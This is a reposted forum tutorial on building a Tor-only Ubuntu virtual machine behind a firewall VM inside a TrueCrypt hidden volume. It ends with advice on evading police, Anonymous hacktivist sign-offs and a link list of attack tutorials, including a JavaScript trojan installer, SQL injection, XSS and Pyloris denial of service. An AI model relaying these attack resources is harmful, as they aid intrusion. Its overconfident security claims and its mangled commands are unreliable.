15. “Virtual Hard Disk”, Uncheck “Boot Hard Disk” and click “Next”
16. If a Warning dialog appears, click “Continue”
17. Click “Finish”
18. Now you will notice “Firewall, Powered Off” visible in your VirtualBox control panel. Make sure it is highlighted (it should be) and then right click it, and select “Settings”.
19. Select “Network” in the menu to the left.
20. Click on the “Adapter 2” tab.
21. Check “Enable Network Adapter” and next to where it says “Attached to”, select “Internal Network” from the pulldown menu.
22. Click “Ok” at the bottom.
23. Once again, right click “Firewall, Powered Off” and select “Start”
24. Check “Do not show this message again” and click “Ok”. This is just letting you know that the “RIGHT CTRL KEY” on your keyboard is the “control” key for this virtual machine.
25. “Welcome to the First Run Wizard”, click “Next”
26. “Select Installation Media”, under “Media Source” is a pull down menu. To the immediate right of that pull down menu is an icon with a folder. Click that folder icon.
27. Locate “current.iso” or “dsl-4.4.10.iso” (or the similar file name) that you downloaded. When located, click “Open”. It is likely in the “Downloads” directory of your home folder.
28. Click “Next”
29. Click “Finish”

Now the virtual machine will start to boot up. Simply wait… (This may take up to 5 minutes.)

30. One or more new dialogs may come up saying “VirtualBox Information”, just click “Do not show this message again” and click “Ok”

After a few minutes, the booting will finish and you will be looking at the desktop for your firewall virtual machine. To the right of the window you will see some stats that look something like this:

Up: 0 k/s - Down: 0 k/s
Processes: 19
CPU Usage: 10%
RAM Usage: 16.2MB/28.8MB

etc.

Congratulations! You now have a firewall running. Now we will set up this firewall to protect you so that you can safely use TOR from your main virtual machine.

=== 10. Firewall Configuration ===

At this stage you should be looking at the desktop for “DSL” (Damn Small Linux).

I need to talk about the mouse first. This particular virtual machine as well as your main operating system (windows) both wants control of your mouse. Both cannot have control of your mouse at the same time however. Therefore, you have to choose whether the mouse will be used by your virtual machine, or by Windows. When you click into your virtual machine, it has the effect of passing control of the mouse to the virtual machine. That means you cannot move your mouse cursor past the boundaries of that virtual machine. In order to give mouse control back to windows, enabling you to move your mouse cursor anywhere, simply press the right ctrl key on your keyboard. That is to say, you have two ctrl keys. One on the left of your keyboard, and one on the right. Press the ctrl key that is on the right of your keyboard. This will give mouse control back to windows.

Practice this a bit. Practice clicking into the window, moving the mouse cursor around, pressing right ctrl, and moving the windows mouse cursor around. Get the feel of it.

You should see a window that looks something like a web browser, with some text in it including words such as “Getting Started with DSL”. First, close that window.

(If your mouse is not working, read this mini-section).

(First, click inside the window that your virtual machine is running in. Now try moving your mouse cursor. If you do not see the mouse cursor moving around, then press RIGHT CTRL + I. Now move your mouse cursor again. If you notice that you are moving your “main” mouse cursor over the window, but you do not see the “DSL” black mouse cursor moving, and then click again into that window. If you do this a few times, you should notice that the mouse begins to work. You may have to press RIGHT CTRL+I a couple of times to get the mouse to work.

1. Once the mouse is working inside of your virtual machine, go ahead and close the window entitled “Getting Started with DSL”

( If you cannot see the full virtual machine window, for example because your screen resolution is set so that some of the window goes too low, read this mini-section).

First, press RIGHT CTRL+I until you have your main windows white mouse cursor back. Now, click on “Machine” in the menu at the top of the window.
Select “Switch to Scale Mode” Click “Switch”

Now you will have converted your firewall window to a smaller size, and you will be able to resize it. You may need to press “right ctrl” to get a windows mouse cursor which you will need in order to resize this window. Now simply resize it to the size that works for you, and then click into the window to be able to use the black mouse cursor inside the virtual machine. I recommend you maximize this window to make sure you can read everything clearly.

2. Right click anywhere on the desktop, go to System (a red folder), go to Daemons, ssh, and start.
3. Right click again anywhere on the desktop, go to XShells -> Root Access -> Transparent

4. Now you have a window that you can type in. Type exactly as shown below into this window, and hit enter:

passwd

Once you type this and hit enter, it will ask you for a password. This is a password for full access to the firewall. Make it at least 8 characters in size.

*** IMPORTANT: Do not forget your firewall password. You will need it later in the guide. ***

When you have successfully changed your password, it will say “Password changed.”

5. Now type exactly as shown below, into the same window:

ifconfig eth1 10.0.3.1

6. It will not say anything after you hit enter; it will just return you back to the prompt.

Now our firewall server is ready. We want to save this state so that we can get back to it easy in the future.
Press RIGHT CTRL+S

7. Now you will be looking at a window that says “Take Snapshot of Virtual Machine”. Just click “Ok”

8. Now, let’s test this out to confirm it works as we expect. Go ahead and close the virtual machine by clicking the “X” in the top right corner. A menu will come up. Select “Power off the machine” and click ok. Do NOT check the box called “Restore current snapshot”.

And now you should be once again at the VirtualBox manager. You will see “Firewall (Shapshot 1), Powered Off”

9. Make sure that “Firewall (Snapshot 1), Powered Off” is selected. At the top right of your VirtualBox Manager is a button that says: “Snapshots (1)”. Click it.
10. Click on “Snapshot 1”, the top-most selection. This will highlight it.
11. Now right click it, and click on “Restore Snapshot”
12. A dialog box will come up asking if you are sure, click “Restore”
13. Now click the “Start” button at the top with the large green arrow.
14. Any dialog boxes that come up with a check box saying “Do not show this information again”, simply check the check-box, and click ok. Do not worry about any of those.

Remember, if you do not have immediate control of the mouse inside the virtual machine, simply press RCTRL+I (press right ctrl and “I” at the same time) and click into it until you have mouse control.

Now your firewall is good to go. Any time you need it, just go to the VirtualBox Manager and follow steps 9 through 14 above. You do not have to go through the whole setup process again at any time in the future. Your firewall is ready.

=== 11. Installing Ubuntu ===

Now we are going to set up the main machine that you will be using TOR with.

1. First, go to this URL: http://www.ubuntu.com

2. Click on the link “Download Ubuntu”
3. Click “Start Download” (This download should take 10-15 minutes)
4. The filename is going to be similar to: ubuntu-10.10-desktop-i386.iso

Now we wait…

While you are waiting for the file to download, go ahead and make sure that your “hidden volume” is mounted in TrueCrypt to a particular drive letter. For example, O: You will need that for the next step.

5. Return to your “VirtualBox Manager”. It doesn’t matter if the firewall is running or not.
6. Click “New” (the blue round star-icon in the top left) again.
7. “Welcome to the New Virtual Machine Wizard”, click “Next”
8. “VM Name and OS Type”, under “Name”, type “Primary”
9. Next to “Operating System”, select “Linux”
10. Next to “Version”, select “Ubuntu” and Click “Next”
11. “Memory”, by default it selects 512 MB. This is fine. 256 MB is the MINIMUM. The more memory you allocate, the better the virtual machine will function. Click “Next”
12. “Virtual Hard Disk”, Make sure “Boot Hard Disk” is checked. Make sure “Create new hard disk” is selected. Click “Next”
13. “Welcome to the Create New Virtual Disk Wizard”, click “Next”
14. “Hard Disk Storage Type”, select “Fixed-size storage” and click “Next”
15. “Virtual Disk Location and Size”, to the right of the text box containing “Primary” is a folder icon. Click the folder icon.
16. Now we have to select a file for the new hard disk image file. On the bottom of this dialog it says “Browse Folders”, click on that.
17. Now click on “Computer” in the menu to the left.
18. Scroll to where you see the drive letter you mounted, and double click on it. Ex: Local Disk (O:)
19. Now click “Save”
20. By default 8.00 GB are selected. That is fine. If you have enough space on your hidden volume, increase this to 10 GB. Otherwise, 8 is fine.
21. Under “Location”, it should say O: Primary.vdi where O: is replaced by whatever drive letter you mounted your TrueCrypt hidden volume to.
22. Click “Next”, then click “Finish”

Now we wait for VirtualBox to create the hard drive we asked for. This may take a few minutes.
Keep in mind this entire virtual machine as well as any of its contents is going to reside within the hidden truecrypt container. This ensures extra security.

23. When this is done, you will see a “Summary” window. Click “Finish”.
24. Now, right click on “Primary, Powered Off” in your “VirtualBox Manager”, and click “Start”
25. Again we are at the “First Run Wizard”, click “Next”
26. “Select Installation Media”, under “Media Source” is a pull down menu. Click the “folder icon” to the immediate right of that pulldown menu.
27. Locate “ubuntu-10.10-desktop-i386” (or the similarly named file) from your Downloads directory, or wherever you saved it. Click on it, and click “Open”
28. Click “Next”
29. Click “Finish”

Now simply wait. Your Ubuntu virtual machine will be loading up. This may take a few minutes. Don’t worry if you see all kinds of strange messages/text. It is normal.

After a few minutes, you should start to see the Ubuntu desktop load. Unlike your firewall, you will notice that you do not have to click the mouse inside the window. It automatically happens. This is going to be much easier than the “Firewall” step.

Once everything has loaded, you will be looking at a window that says “Install” with a button that says “Install Ubuntu”. If you cannot see everything, press RCTRL+F (to go full screen). You can return to windowed mode by RCTRL+F again. Any dialogs can be closed, and you can check the box that says “Do not show me this again.”

30. Click “Install Ubuntu”
31. Check “Download updates while installing”
32. Check “Install this third-party software”. Click “Forward”
33. Ensure “Erase and use entire disk” is selected, and click “Forward”. Remember, this is NOT talking about your hard disk. It is talking about the 8-10 gigabyte virtual disk.
34. Click “Install Now”
35. Now you will be guided through a series of installation related screens. The first screen asks you to select your timezone/time. Select your choice (NOT REAL ONE) and click “Forward”
36. Now keyboard layout, again select your choice and click Forward. If you are unsure, leave it as is or click “Figure out keyboard layout”
37. “Who are you?” For “Your name” type in: mainuser
38. When you type in “mainuser” the other boxes will fill in automatically. Now click in the text box next to “Choose a password”.
39. Do NOT use the same password as the firewall. Come up with a different password.
40. Ensure that “Require my password to log in” as well as “Encrypt my home folder” are selected and checked and proceed.

Now simply wait until the installation is finished. The installation may take a while, and it may appear to stall at some points. As long as the ubuntu mouse cursor shows an animation that is turning around in circles, the installation *is* working. Simply wait until it is done. If after an hour or two the progress bar hasn’t moved at all, then go ahead and re-start the installation starting from step 24 (after closing the window and powering down the virtual machine).

Depending on your computer, it could take 2-4 hours. Most likely, it will take about an hour. Once finished, you will see a dialog that says “Installation Complete” with a button that says “Reboot Now”. Do NOT press the “Reboot Now” button. Close the ‘X’ on this window, and Power Down.

41. Now, right click “Primary” and go to “Settings”.
42. Click on “Storage” in the left menu. Then click on the “ubuntu-10.10… .iso” under where it says “IDE Controller”
43. To the right it says “Attributes” under that it says “CD/DVD Drive: …” to the immediate right of that is a cd icon. Click it.
44. Select “Remove disk from virtual drive.”
45. Click “Ok”
46. Now, making sure that “Primary” is highlighted, click the “Start” button at the top with the large green arrow.

Now we wait for your newly installed Ubuntu machine to boot up.

47. After a few minutes, you will see a dialog appear that says “mainuser-VirtualBox”. Go ahead and click on “mainuser” which has the “person icon” to the left of it.
48. Now it will prompt you for your password. Enter the password you used in the installation process.
49. After a minute or so, you should hear a nice login sound, and you should be fully logged into your virtual machine.
50. Keep waiting, and a dialog will appear that says “Information available” and “Record your encryption passphrase” Click on: “Run this action now”
51. Type in the same password you used to log in. After that window closes, click “Close” in the dialog box.

Congratulations! You have now set up a virtual machine as well as a firewall to protect it. Now we need to finish configuring the primary virtual machine.

=== 12. Ubuntu Initial Setup ===

Ok, now that we have installed Ubuntu, we need to set it up so that we can use it fully. This also means making sure we can see flash on websites such as YouTube.

1. First, we have to install any updates that are pending. At the bottom of your screen, you should notice where it says “Update Manager”. Click on that.
2. Now, click on “Install Updates”. If you did not see “Update Manager”, then skip these two steps.
3. Any time an administrative task is required, you will need to type in your password. This is the same password you used to log in.

Now we wait, this is going to download any necessary security updates to make certain we are using the most current/secure setup possible. This may require downloading hundreds of megabytes. Just go ahead and let it do that, and when everything is downloaded and updated, proceed to the next step. While you wait, Ubuntu may go into screensaver mode. If so, just move the mouse and it will ask you for your password. That will leave screensaver mode.

If the updates are more than a hundred megabytes, it will take quite a while. It may take up to 2-3 hours depending on your computer and internet connection. Nonetheless, this step is critical. Do not skip the updates. Besides ensuring that your setup will be secure, the updates also ensure that all of the applications are up to date and thus most likely to function correctly. Just go ahead and watch a movie for a couple hours and then return and check on it.

After all of the updates have been downloaded and installed, the “Update Manager” window will now say “Your system is up-to-date” at the top. Further, it will say: “The computer needs to restart to finish installing updates.”. Go ahead and press the ‘X’ in the top right corner of the window, and choose ‘Send the shutdown signal”. If prompted, click “Shut Down”. Once it has fully shut down, the window will disappear and you will be back at the VirtualBox manager. Go ahead and right click on “Primary” and click “Start”. This will restart the virtual machine.

If a virtual machine fails to shutdown after 10 minutes or so, then go ahead and close the window again by pressing the ‘X’ but this time choose “Power down”. If it still will not shut down, then VirtualBox may have crashed. If so, just follow these instructions:

(Follow the steps in this mini-section if a virtual machine fails to shutdown, or you need to completely close/restart VirtualBox).

First, press “Ctrl+Alt+Delete”, and then click “Task Manager”
Next, locate the process that is running that starts with “VirtualBox”. Right click that process, and click “End Process Tree”
This should force the window to close.
Now, restart VirtualBox by going to your start menu, All Programs, Oracle VM VirtualBox, VirtualBOx. Now you will have the VirtualBox manager up again. To restart the Ubuntu machine, simply right click on “Primary” and click “Start”.

Once your Primary vm has rebooted, you will be again at the login screen. Here as before, click on “mainuser” and then enter in your password. Now your primary machine is fully up to date. Remember, be patient. It may take a few minutes before your virtual machine has fully booted. First you will see the background image and a mouse cursor that can move around, next you should hear the login sound play, and finally you will see the menu at the top and bottom of your virtual machine window. Depending on the speed of your computer, this may take 10 minutes or more. Just be patient. Don’t worry if your virtual machine appears to be running too slow, we will speed it up.

Now your Virtual Machine is set up and ready for use.

=== 13. Installing Guest Additions ===

In order to ensure that the Virtual Machine runs smoothly as possible, we are going to install some additional software to the virtual machine.

1. Go to the “Devices” menu at the top of your virtual machine main window (Machine, Devices, Help), and go to “Install Guest Additions”
2. Go to the “Places” menu at the top of your virtual machine (Applications, Places, System), and click on “VBOXADDITIONS_4.1.8 -75467” (the number may be different).
3. At the top this new window will be the text “The media has been determined as “UNIX software”. Click on “Open Autorun Prompt”
4. A new dialog may appear saying “This medium contains software intended to be automatically started. Would you like to run it?” Click “Run”
5. Enter your administrative password (the one you use to log into Ubuntu) and click “Ok”
6. Now the VirtualBox Guest Additions installer will begin. This may take some time, so just relax and wait. Depending on your computer, this may take 30 minutes or more.
7. When this is finished, you will see the text “Press Return to close this window.” Go ahead and do so.
8. Once that window has closed, go ahead and press the ‘X’ to close the entire virtual machine window. Select “Send the shutdown signal” and click “Ok”.
9. A dialog box will appear. Click on “Shut Down”, the top most option.

At this stage it is a good idea to further optimize our virtual machine. When you initially installed it, you most likely selected either 256 MB or 512 MB of RAM. If you have enough RAM to spare, then I highly recommend you increase that to at least 1 GB. Here is how to do so:

1. First, right click on “Primary, Powered off” and go to Settings.
2. Select “System” from the menu on the left.
3. Increase the “Base Memory” to either 1024 MB (1 GB), or some higher value you are comfortable with.

It is also a good idea to increase the video memory available to the virtual machine.

4. Select “Display” from the menu on the left, still inside of “Settings”
5. Increase the “Video Memory” slider to the right as far as you are comfortable with. For example, 128 MB.
6. Check the box “Enable 3D Acceleration”.
7. Now click “Ok” at the bottom.

Go ahead and start up Ubuntu again by right clicking “Primary, Powered off” and clicking “Start”

When Ubuntu loads up, go ahead and log in as before using your password. Now wait until Ubuntu is fully booted and the “Applications Places System” menu is visible.

You will probably notice that your virtual machine loads up and runs faster than before.

How well your virtual machine runs depends on how good your computer is. Primarily, RAM and processor speed are the most significant factors. If your computer is modern enough, you should be able to use websites with flash and even watch videos, such as on YouTube, with no problem. If your computer is not as modern, you will still be able to browse websites but may not be able to watch videos. You should still be able to use most flash based websites however.

*** IMPORTANT: Do NOT browse sensitive content YET. At this stage, your virtual machine is not yet configured to use TOR. ***

=== 14. Installing IRC (Optional) ===

*** This section is entirely optional. If you are not interested in installing IRC, skip this section ***

To install IRC on your new virtual machine, follow these steps:

1. Go to the “Applications” menu, and go to “Ubuntu Software Center”
2. Type “kvirc” in the search box field in the top right.
3. When the results return, select the one called: “KDE-based next generation IRC client” or “KV Irc”.
4. Click “Install”
5. Enter your password when prompted.
6. While it installs, you will notice a progress bar. This may take a few minutes depending on the speed of your internet connection.
7. Once it is finished installing, the progress bar will go away. Go ahead and close the “Ubuntu Software Center”.

You are probably used to the close/min/max buttons being on the top right, as is the case in Windows. You will find them in the top left instead. If you don’t like this, don’t worry. You can change it later.

Now, let’s go ahead and set up KVIrc.

Remember, you are NOT truly anonymous yet.

8. Click on “Applications” in the top menu.
9. Go to “Internet”
10. Click on “KVIrc”
11. “KVIrc Setup” will appear. Go ahead and click “Next” to begin.
12. “Store Configuration in Folder”, click “Next”
13. “Please choose a Nickname”. You can leave this exactly as is, or you can choose a Nick name then click “Next”.

*** IMPORTANT READ THIS ***

Do NOT pick a nick name you have ever used before, or a nick name that can help someone determine who you are. Also, do NOT fill in any other details such as location, age, real name, etc. Leave everything else as is.

You are NOT anonymous yet.

14. Now you are asked to pick a theme, select “No theme” then click “Next”
15. Now click “Finish” to leave the KVIrc Setup.
16. A new window will appear having a list of servers, click “Close”

Now let’s connect to the “Freenode” IRC network. By now, you may have many questions about how to use Ubuntu. The #Ubuntu chatroom on Freenode is a great place to start, and where you can ask questions related to how to use Ubuntu and VirtualBox. Please remember, you are NOT anonymous yet and anything you say can be matched to your IP address. Keep the conversation related to technical help, or just learning Ubuntu.

Do NOT discuss TOR.
Do NOT discuss ANY sensitive material.

Remember, this chatroom consists mostly of people who have set up Ubuntu for other reasons. Therefore, they will be able to help you configure it,

=== 15. Installing Torchat (optional) ===

*** This section is entirely optional. If you are not interested in installing Torchat, skip this section. ***

Torchat is a program you can use to communicate securely and anonymously with other Torchat users. It is only useful if you already know someone who is using it. If you do not know someone using Torchat, then it is best to skip this section and come back to it in the future when you want to install Torchat. These instructions work for Ubuntu 10.10.
First, installing Torchat is a bit tricky because Ubuntu does not include Tor by default in its repositories. Tor is a requirement for Torchat, and therefore we have to first install Tor on Ubuntu. Doing so is not too difficult.

1. First, go to “Applications” -> “Accessories” -> “Terminal”. You will see a new window appear with a prompt that looks like this:

mainuser@mainuser-VirtualBox:~$

2. Now, type exactly as shown below, and hit enter:

sudo bash

3. After entering your password, you will be at a new prompt which looks like this:

root@mainuser-VirtualBox:~#

4. Now, either type or copy-paste the below text into this window and then hit enter:

echo “deb http://deb.torproject.org/torproject.org experimental-lucid main” | sudo tee -a /etc/apt/sources.list sudo apt-key adv —keyserver keyserver.ubuntu.com —recv-keys 886DDD89

5. After you do this, you should see the following at the bottom of your window:

gpg: Total number processed: 1
gpg: imported: 1 (RSA: 1)

6. Now, we should be able to install tor. In this same window, type the following commands, one at a time:

apt-get update
apt-get install vidalia privoxy tor

7. (press Y and enter when prompted)

Now we need to obtain the Torchat installation file, follow these steps:
8. In firefox on Ubuntu, go to the following URL: http://code.google.com/p/torchat
9. On the left under where it says “Downloads”
10. One of the files listed will end in .deb, for example torchat-0.9.9.deb. Click on that file name.
11. On the next page, again click on the file name. This should begin the file download.
12. By default, Ubuntu wants to open this file using the “Ubuntu Software Center”.
This is correct.

Now wait until the file finishes downloading, and then the “Ubuntu Software Center” will appear. Follow these steps:
1. Press “Install”
2. Type in your password when prompted.
After a short wait, Torchat will be installed.

To start Torchat, go to “Applications” -> “Internet” -> “Torchat Instant Messenger”

=== 16. Creating TOR-Only Internet Environment ===

Up until now, we have been using our Virtual Machine to access the internet directly. This was necessary so that we could install updates, software, and get a feel for how to use Ubuntu.
Now it is time to force Ubuntu to connect to the internet using TOR Only. At the end of this phase, your Ubuntu virtual machine will be usable as a secure and anonymous TOR based browsing environment. It will be *impossible* for you to access the internet except through TOR, and therefore you can rest assured that anything at all you do online through the Ubuntu virtual machine will be through TOR.
First, we need to shut down any running virtual machines. If “Primary” is running, click the ‘X’ in the top right to close it. Select “Send shutdown signal” and then select “Shut Down” when prompted. If “Firewall” is running, go ahead and close it in the same way, but choose “Power off”. After a minute or so, you should be back to your VirtualBox Manager, with neither virtual machine running.

1. Right click on “Primary, Powered Off” and go to “Settings”
2. Select “Network” from the menu on the left.
3. Next to “Attached to” is a pull down menu. Right now it is set to “NAT”. Choose “Internal Network” and click “Ok”
4. Click “Firewall” to highlight it, and then click on “Snapshots (1)” in the top right.
5. Right click on “Snapshot 1” and then select “Restore Snapshot”. Select “Restore” if prompted.
6. Right click “Firewall” and click “Start”

Now your Firewall will be resumed exactly where it had been previously set up. The last command entered should still be visible. Before you proceed, make sure that TOR is running on your main Windows computer. If it is, you will see an “Onion” icon visible in your task bar. Click on that icon and you should see the “Vidalia Control Panel”. Make sure that it says “Connected to the TOR Network”. If so, you are ready to proceed. If not then please see section 2 : “Using and Testing Tor Browser for the first time” to re-start TOR. Once TOR is running, proceed.

Let’s restart Ubuntu:
7. Right click “Primary” and click Start. Log in as normal.
8. After fully logged in, open “Firefox” by clicking the orange “Firefox” logo at the top, next to “System”.
9. Try to go to any website, such as www.google.com. Try at least 3-5 different websites. You should not be able to connect to any of them.
Note: If you attempt to go to websites you have already been to using Ubuntu, they may appear to load because they are cached.
10. In Firefox on Ubuntu, go to “Edit” and “Preferences”
11. Click on the “Advanced” icon
12. Click on the “Network” tab
13. Under “Connection” it says “Configure how Firefox connects to the internet”. To the right of that is a “Settings” button. Click that button.
14. Select “Manual proxy configuration”
15. Next to both “HTTP Proxy” and “SSL Proxy” type in: 127.0.0.1
16. Set the port to 8118 for both “HTTP Proxy” and “SSL Proxy”
17. Next to “SOCKS Host” type: 127.0.0.1
18. Set the port for “SOCKS Host” to 9050
19. Make sure that “SOCKS v5” is selected at the bottom.
20. Click “Ok” and then “Close”

Now we have instructed Firefox to use TOR. However, Firefox cannot use TOR yet. Right now, Ubuntu is completely unable to connect to the Internet. We are going to change that.

21. Go to “Applications” -> “Accessories” -> “Terminal”
22. Type in: sudo bash (and hit enter)
23. Type in your password if prompted.
24. Type in the following commands exactly as shown below (or copy paste them):

ifconfig eth0 10.0.3.2
/etc/init.d/polipo stop
/etc/init.d/tor stop
/etc/init.d/privoxy stop

(Note: the last three commands, those beginning with /etc/ are only necessary if you installed Torchat)

Now you have told your Ubuntu machine to join the same network that your Firewall is on. Now we can establish a tunnel for TOR data to flow from our Ubuntu machine, through the Firewall, into your Windows guest machine. We need to establish two such tunnels. The first tunnel for port 9050 data, and the second tunnel for port 8118 data. When these two tunnels are set up, it will be possible for you to use your Ubuntu machine to access any website using TOR. Further, it is still completely impossible for your Ubuntu machine to access the Internet in any other way.

25. Your terminal window should still be open. Type in the following command exactly as shown (or copy paste it):

ssh -N -L 9050:10.0.2.2:9050 root@10.0.3.1

26. Type “yes” if prompted. When prompted for the password, give your Firewall password. Not your Ubuntu password.

After you hit enter, you will see the cursor go to a blank line and nothing else happens. This simply means the connection you requested is active. If the connection were to stop for any reason, you would return to a command prompt. If you want to terminate the connection yourself, simply hit CTRL+C. You can type in the same ssh command again if you need to re-open the tunnel.

27. Now we are going to open the second tunnel. In your terminal window, go to “File” and “Open Tab”. This will open up a tab for a second terminal without affecting the first.
28. Now, type exactly as shown below to open the second tunnel:

ssh -N -L 8118:10.0.2.2:8118 root@10.0.3.1

29. Return to Firefox. Go to the “File” menu and uncheck “Work Offline” if it is checked.
30. Go to the URL: http://check.torproject.org
If you see the text: “Congratulations. Your browser is configured to use Tor” then you are all set! Your Ubuntu virtual machine is now NOT connected to the internet in any way. However, you can browse any website using TOR, even Youtube. You do not have to be afraid of JavaScript or Flash. Any files you save onto your virtual machine will automatically be saved in the encrypted truecrypt volume you set up earlier. In fact, everything the virtual machine does will be contained within that truecrypt volume.
Further, even if someone somehow managed to remotely gain full root access to your Ubuntu machine (absurdly unlikely to happen), they would still not be able to see *anything* about who you are, or what your real IP address is, or even that you are using a Virtual Machine. To them, it would appear that the Ubuntu machine is your main computer. They would be totally unable to compromise your identity based on this alone. However, keep the following in mind. If someone were to gain access to your Ubuntu machine, they WOULD be able to see anything you have used it for or any files you have saved. Therefore, I recommend for the sake of absolute security, do not store anything on your Ubuntu virtual machine that identifies you. This is just a precaution. It is virtually impossible that someone would manage to remotely gain access to your Ubuntu machine.

=== 17. General Daily Usage ===

Much of this guide has involved detailed one-time setup processes. From now on, all you have to do when you want to use TOR from your Ubuntu virtual machine is to follow these steps. Every step listed is a step you have already done, so feel free to revisit earlier sections if you need help.

1. Start TrueCrypt, and mount your hidden volume which contains your virtual machine.
2. Start VirtualBox
3. Start TorBrowser Bundle.
4. Click “Firewall” to highlight it, and then click on “Snapshots (1)” in the top right.
5. Right click on “Snapshot 1” and then select “Restore Snapshot”. Select “Restore” if prompted.
6. Right click “Firewall” and click “Start”
7. Right click “Primary” and click Start. Log in as normal.
8. Go to “Applications” -> “Accessories” -> “Terminal”
9. Type in: sudo bash (and hit enter)
10. Type in your password if prompted.
11. Type in the following commands exactly as shown below (or copy paste them):

ifconfig eth0 10.0.3.2
/etc/init.d/polipo stop
/etc/init.d/tor stop
/etc/init.d/privoxy stop

(Note: the last three commands, those beginning with /etc/ are only necessary if you installed Torchat)

12. Your terminal window should still be open. Type in the following command exactly as shown (or copy paste it):

ssh -N -L 9050:10.0.2.2:9050 root@10.0.3.1

13. Type “yes” if prompted. When prompted for the password, give your Firewall
password. Not your Ubuntu password.

14. In your terminal window, go to “File” and “Open Tab”.
15. Now, type exactly as shown below to open the second tunnel:

ssh -N -L 8118:10.0.2.2:8118 root@10.0.3.1

16. Return to Firefox. Go to the “File” menu and uncheck “Work Offline” if it is checked.
17. Go to the URL: http://check.torproject.org
If you see the text: “Congratulations. Your browser is configured to use Tor” then you are all set! Enjoy!

Phew, now i have it complete! I admit it’s quite extensive, not to say enormous, but it’s the best how-to on anonymity and other safety procedures i have found so far. It secures your sys black-hat style^^ :

http://en.wikipedia.org/wiki/Black_Hat_Briefings

(for those of you who don’t know black hat ^^)

You don’t have to do all steps at once. You can do a little of it every time you have an hour or two to spare. I think for the whole procedure you will need roughly 8-12 hours. I think its written in a way everybody should be able to follow. If there are still steps unclear just ask, i will see if i can help you. btw this is written for noobs, but the tips here are interesting for almost everybody.

P.S.: Once you have installed TOR you can get access to TOR hidden services and other interesting deep-web pages. If you want some links for your first steps into this hidden part of the internet just PM me. If there is a lot of requests I will write an extra thread with the most important websites in the deepweb.

One thing before you get started: most deepweb pages aren’t online 24/7. So if you can’t reach a certain website be patient and try again and again till you get access.

Another thing: you will find websites that are pretty shocking and disturbing. In 99.5% you will see beforehand what you find on those sites, so if you dont want to see certain things don’t click on the links.

Now that you have a really secure system, you should know what to do when the shit hits the fan and you are arrested or your home gets searched. Your system is secured in a way they can’t break, so the only thing that can incriminate you now is your testimony. These 2 YouTube videos are 2 lectures on behavior towards the police in such situations. Part one is done by a criminal defense attorney, part 2 by a very experienced police officer. They both tell you about the tricks the police uses and how you should react:

http://www.youtube.com/watch?v=6wXkI4t7nuc

http://www.youtube.com/watch?v=08fZQWjDVKE

FIRST AND ONLY RULE: say nothing and ask for a lawyer, ALLWAYS! You cannot improve your situation with anything you say (this is counterintuitive, but the attorney here has in his whole carrier NEVER heard of single case where a suspect could help his case by talking to the police, but he could name many cases where they made matters way worse) but you can make it a lot worse, so shut the hell up and wait for your lawyer. Even he being a defense lawyer wouldn’t talk to the police under any circumstances.
You can tell your story before court AND NEVER, UNDER NO CIRCUMSTANCES, BEFORE THAT! Even the cop in lecture 2 says NEVER TALK TO THE POLICE!!!!!

NO©
☢☠☢
Share by MasterPirate™ ✔

Share by #OpHackStorm

☣ I’m a Pirate ☠

I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.

☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢

Long live the ones who dare..

UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong

☠SHARE ☠SHARE ☠SHARE ☠SHARE

☠SHARE ☠SHARE ☠SHARE ☠SHARE

☠SHARE ☠SHARE ☠SHARE ☠SHARE

- #Anon
- #anonymous
- #anonymiss
- #anonfamily
- #antiSOPA
- #antipipa
- #antiacta
- #free
- #freedom
- #fight
- #freeweb
- #democracy
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #lulz
- #LulzWarfare
- #lulztime
- #LuLzWar
- #ows
- #occupywallstreet
- #OpCensorThis
- #occupytogether
- #occupytheworld
- #OccupyEveryhere
- #OpHackStorm
- #OpShitStom
- #REVOLUTION
- #rebel
1 year ago
Permalink

View Separately

Previous Next

By AntiSec Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture for LULZ

Anonymous/#Tutorials
Welcome. This is a list of the current tutorials from the AnonOps IRC.

BASIC ANONYMITY/PRIVACY
Before you get into the IRC, You will need to learn how to hide yourself. VPNs and Proxys are most popular but some use Tor for their browsers. Tor is blocked in AnonOps because of abuse.

Popular VPNs are :
http://vpntunnel.se [Secure, fast and accepts UKash]
http://swissvpn.net [Popular, fast]

☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢ Feel free to add more ☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢

Tor project link :
http://torproject.org
https://www.torproject.org/docs/installguide.html

Tor on Linux Tutorial :
      http://bit.ly/ik50kW
      Tor on OS X Tutorial [Video] :
      http://bit.ly/jaoKxS

Privoxy :
      http://www.privoxy.org/
      Documentation: http://www.privoxy.org/user-manual/index.html
      Check user-agent: http://whatsmyuseragent.com/

I2P :
http://bit.ly/78At2Y

Ethical Hacking :
http://bit.ly/qKQaQf

Anonymous/Disposable emails :
http://www.email-wgwerf.de/wegwerfemail-liste.html
http://www.yopmail.com

AnonTiny
Windows only communication package for tor, with the ability to host a hidden IRC or WEB server : Includes a tinyC compiler and a LOLCODE interpreter
http://bit.ly/qhC55s

HACKING AND ATTACKING
Anonymous and its groups use lots of ways to attack websites, servers and computers. Here is a list of tutorials found and made by people in #Tutorials.

A few books on hacking :

Hacking exposed 2011 :
http://bit.ly/pC8PWl

Hacking Exposed Web Applications :
http://tinyurl.com/5shry2p

Hackers Under Ground Handbook :
http://tinyurl.com/6zr6yvw

Hacking Exposed Linux Third Edition :
http://tinyurl.com/6hkj7jh

How to exploit a site with XML bug :
http://bit.ly/nAiOIf

Javascript trojan installer
***You just need to edit the source code for your website, and .exe for your trojan***
http://bit.ly/oBhdOe

SQLi Hacking
http://bit.ly/j6LQ3W

Slow Posting with Pyloris
http://bit.ly/jM3mLu

Google Hacking For Penetration Testers Johnny Long:
http://bit.ly/ebf6q3 Volume 1
http://bit.ly/ljyySd Volume 2

Intersting Tools for Windows :
Fiddler - decrypt / intercept SSL and capture web-traffic
http://www.fiddler2.com/fiddler2/

Nmap
http://bit.ly/qUrrTd

Misc. Tools
      http://bit.ly/1o5cov
      Metasploit Meterpreter
      http://bit.ly/n9H1ke

Oracle Security
http://bit.ly/qHJebW

XSS
http://bit.ly/1bqjvv

SQl Injection
http://bit.ly/qWWaW7

ADVANCED ANONYMOUS DEFENCE

Ok, As noted at the beginning, VPNs and Proxy are crucial to your online security. Follow these tips and you should be fine :)

      1) Get your VPN and Proxy now.
      2) Make sure you ALWAYS use your VPN and Proxy.
